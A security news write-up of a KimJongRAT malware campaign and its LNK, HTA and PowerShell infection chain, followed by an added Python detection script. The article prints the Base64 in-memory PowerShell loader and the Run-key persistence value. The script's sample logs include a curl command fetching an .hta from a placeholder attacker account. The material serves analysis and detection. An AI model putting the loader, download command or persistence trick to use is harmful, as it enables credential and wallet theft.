A sophisticated evolution of the KimJongRAT malware family has emerged, demonstrating advanced techniques for credential theft and system compromise through weaponized Windows shortcut files and PowerShell-based payloads.
This latest campaign represents a significant advancement from previous variants, incorporating both Portable Executable (PE) and PowerShell implementations that specifically target cryptocurrency wallet extensions and sensitive browser data.
The malware’s multi-stage deployment architecture leverages legitimate content delivery network services to mask malicious activities, making detection considerably more challenging for traditional security solutions.
The attack begins with deceptively named LNK files, such as “성범죄자 신상정보 고지.pdf.lnk”, suggesting the campaign may be targeting Korean-speaking users with social engineering tactics designed to exploit public safety concerns.
These initial files serve as sophisticated downloaders that establish the foundation for a complex infection chain involving multiple file types and deployment stages.
Palo Alto Networks researchers identified that this new variant represents a substantial departure from the original KimJongRAT stealer first documented in 2013, incorporating modern evasion techniques and expanded targeting capabilities.
The malware’s developers have demonstrated remarkable adaptability, continuously updating their tools to bypass current security measures while expanding their focus to include the lucrative cryptocurrency sector.
The research reveals two distinct implementation approaches: a traditional PE variant and an innovative PowerShell-based version, both designed to maximize data exfiltration while maintaining persistence on infected systems.
The economic implications of this campaign are particularly concerning given the malware’s extensive focus on cryptocurrency wallet extensions, with the PowerShell variant targeting over 40 different browser extensions including MetaMask, Trust Wallet, Exodus Web3 Wallet, and numerous other popular cryptocurrency management tools.
This comprehensive targeting approach suggests the attackers are well-informed about the cryptocurrency ecosystem and are positioning themselves to capitalize on the growing adoption of digital assets among both individual users and organizations.
Multi-Stage Infection Mechanism and Payload Deployment
The infection mechanism employed by this KimJongRAT variant demonstrates sophisticated understanding of Windows security architecture and user behavior patterns.
Upon execution, the initial LNK file utilizes legitimate Windows utilities including cmd.exe and curl.exe to download an HTA (HTML Application) file from attacker-controlled accounts on cdn.glitch.global, a legitimate CDN service.
This approach provides several advantages for the attackers, including the ability to host malicious content on trusted infrastructure while avoiding direct attribution to their own servers.
The downloaded HTA file, typically named either “pdf.hta” or “sfmw.hta” depending on the variant, contains obfuscated VBScript code alongside multiple Base64-encoded payloads embedded within the file structure.
The PowerShell variant’s HTA file specifically drops two critical components: a decoy PDF document designed to maintain the illusion of legitimate content, and a ZIP archive containing the actual malware components.
The decoy documents often relate to Korean administrative forms, reinforcing the apparent geographic targeting of this campaign.
The ZIP archive extraction reveals a carefully orchestrated deployment system comprising four distinct files: “1.ps1” (PowerShell loader), “1.log” (Base64-encoded stealer), “1.vbs” (persistence mechanism), and “2.log” (keylogger module).
The PowerShell loader employs a simple yet effective technique, using the Invoke-Expression cmdlet (iex) to decode and execute the Base64-encoded stealer directly in memory, as demonstrated by the one-line loader: iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content $args)))).
The stealer component implements comprehensive anti-analysis measures, including VMware detection through UUID examination and automatic deletion of malicious files when virtual machine environments are detected.
The malware establishes persistence through Windows registry modification, creating an entry under “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” with the key “WindowsSecurityCheck” that ensures automatic execution upon system startup.
This persistence mechanism, combined with the malware’s ability to operate entirely through legitimate system utilities and PowerShell, makes detection through traditional signature-based methods extremely difficult while providing attackers with long-term access to compromised systems.
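As an added example (not code from the article or from Palo Alto Networks), the following Python rules flag the three observable stages described above over a few constructed log lines: the cmd.exe/curl.exe fetch of an .hta file from cdn.glitch.global, the iex/FromBase64String/Get-Content loader pattern, and the WindowsSecurityCheck value under the HKCU Run key. The key=value log format, field names, paths and account ID are assumptions, not real telemetry.

```python
import re

# Constructed sample telemetry in a simplified key=value form (not real Sysmon or
# PowerShell-log output); field names, paths and the account ID are assumptions.
SAMPLE_EVENTS = [
    'event=process image=C:\\Windows\\System32\\cmd.exe cmdline="cmd.exe /c curl.exe -o pdf.hta https://cdn.glitch.global/PLACEHOLDER-ACCOUNT/pdf.hta"',
    'event=scriptblock text="iex([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content $args))))"',
    'event=registry key=HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run value=WindowsSecurityCheck data="PLACEHOLDER-PATH\\1.vbs"',
    'event=process image=C:\\Windows\\System32\\notepad.exe cmdline="notepad.exe notes.txt"',
    'event=scriptblock text="Get-Content .\\config.json | ConvertFrom-Json"',
]

FIELD_RE = re.compile(r'(\w+)=("([^"]*)"|\S+)')

def parse_event(line):
    """Turn one key=value line into a dict; quoted values may contain spaces."""
    return {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
            for m in FIELD_RE.finditer(line)}

# One predicate per stage the report describes; each runs over a parsed event.
RULES = {
    # Stage 1: cmd.exe/curl.exe pulling an .hta from the glitch CDN.
    "hta_download_via_curl": lambda e: e.get("event") == "process"
        and re.search(r"\bcurl(\.exe)?\b", e.get("cmdline", ""), re.I) is not None
        and re.search(r"cdn\.glitch\.global/\S+\.hta\b", e.get("cmdline", ""), re.I) is not None,
    # Stage 2: the 1.ps1 loader shape: iex over a Base64-decoded file read with Get-Content.
    "inmemory_base64_loader": lambda e: e.get("event") == "scriptblock"
        and re.search(r"\b(iex|Invoke-Expression)\b", e.get("text", ""), re.I) is not None
        and "FromBase64String" in e.get("text", "")
        and "Get-Content" in e.get("text", ""),
    # Stage 3: persistence through the named value under the HKCU Run key.
    "run_key_windowssecuritycheck": lambda e: e.get("event") == "registry"
        and e.get("key", "").lower().endswith("\\currentversion\\run")
        and e.get("value", "").lower() == "windowssecuritycheck",
}

def detect(lines):
    """Return (line_index, rule_name) for every event that matches a rule."""
    hits = []
    for idx, line in enumerate(lines):
        event = parse_event(line)
        for name, predicate in RULES.items():
            if predicate(event):
                hits.append((idx, name))
    return hits

if __name__ == "__main__":
    for idx, name in detect(SAMPLE_EVENTS):
        print(f"event {idx}: {name}")
```

The two benign events (notepad.exe and a Get-Content call without iex) are included to show that each rule requires the combination of indicators, not any single one.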